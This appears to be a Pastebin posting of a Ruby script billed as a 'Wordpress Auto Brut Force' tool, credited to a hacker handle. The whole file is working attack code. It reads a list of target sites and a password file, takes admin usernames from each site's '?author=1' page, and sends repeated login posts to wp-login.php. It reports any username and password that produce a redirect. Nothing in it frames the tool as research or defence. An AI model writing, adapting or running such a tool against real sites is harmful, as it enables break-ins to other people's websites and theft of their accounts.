Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/user/bin/ruby
- require 'net/http'
- require 'net/https'
- # if site use ssl Del "#" in linge 32
- class String
- def red; "\033[31m#{self}\033[0m" end
- def green; "\033[32m#{self}\033[0m" end
- def brown; "\033[33m#{self}\033[0m" end
- def cyan; "\033[36m#{self}\033[0m" end
- def gray; "\033[37m#{self}\033[0m" end
- def blue; "\033[34m#{self}\033[0m" end
- def bg_red; "\033[41m#{self}\033[0m" end
- def bg_green; "\033[42m#{self}\033[0m" end
- def bg_brown; "\033[43m#{self}\033[0m" end
- def bg_blue; "\033[44m#{self}\033[0m" end
- end
- class Myfucb
- def clean()
- por= RUBY_PLATFORM
- if(por =~ /linux/)
- system("clear")
- else
- system("cls")
- end
- end
- def home()
- print " [*]=========================================[*]\n".brown
- print " [*] Wordpress Auto Brut Force [*]\n".brown
- print " [*] W W W . S E C 4 E V E R . c 0 m [*]\n".brown
- print " [*] H A M Z A K I L L E R [*]\n".brown
- print " [*] Hlyzidi[at]gmail[dot]com [*]\n".brown
- print " [*]=========================================[*]\n\n\n".brown
- end
- def brut(urls,user,pwds)
- userz=user.chomp
- pwd=pwds.chomp
- ur=URI.parse(urls)
- pop=ur.host
- dd=ur.path
- http = Net::HTTP.new(pop, 80)
- #http.use_ssl = true
- path = "#{dd}/wp-login.php"
- ip="http://#{pop}#{dd}/wp-admin"
- resp, data = http.get(path, nil)
- cookie = resp.response['set-cookie']
- posts="log=#{userz}&pwd=#{pwd}&rememberme=forever&wp-submit=Log In&redirect_to=#{ip}&testcookie=1"
- mps= {'Cookie' => cookie,'Content-Type' => 'application/x-www-form-urlencoded'}
- resp, data = http.post(path, posts, mps)
- iz="http://#{pop}#{dd}"
- if resp.code == "302"
- print"[+] #{iz} \n".green
- print"[+] Found : #{userz} => #{pwd}\n".bg_green
- exit
- else
- print"[-] Error : #{userz} =>";print"#{pwd}\r".bg_red
- end
- end
- def adminame(url)
- ur=URI.parse(url)
- pop=ur.host
- dd=ur.path
- path="#{dd}?author=1"
- http = Net::HTTP.new(pop,80)
- resp, data = http.get(path, nil)
- dz=resp.body
- po=dz.scan(/<title>(.*?)<\/title>/i)
- for dzx in po[0]
- #mp=dzx.split('&')
- mpx=dzx.split('|')
- return mpx[0]
- end
- end
- end
- p=Myfucb.new
- p.clean()
- p.home()
- print("# Enter Sites File ->".cyan)
- site=gets.chomp
- print("# Enter Passwords File ->".cyan)
- pass=gets.chomp
- print("# Extect Username Atomatic (y/n)->".cyan)
- exus=gets.chomp
- sit=IO.readlines(site)
- pwd=IO.readlines(pass)
- p.clean()
- if exus == "y"
- p.home()
- for sites in (sit)
- user=p.adminame(sites)
- ur=URI.parse(sites)
- pop=ur.host
- dd=ur.path
- print("http://#{pop}#{dd}\n".bg_blue)
- print("Username:#{user}\n".green)
- for passwords in pwd
- p.brut(sites,user,passwords)
- end
- end
- elsif exus == "n"
- p.home()
- print("# Enter Username ->".cyan)
- us=gets.chomp
- for sites in (sit)
- ur=URI.parse(sites)
- pop=ur.host
- dd=ur.path
- print("http://#{pop}#{dd}\n".bg_blue)
- for passwords in pwd
- p.brut(sites,us,passwords)
- end
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement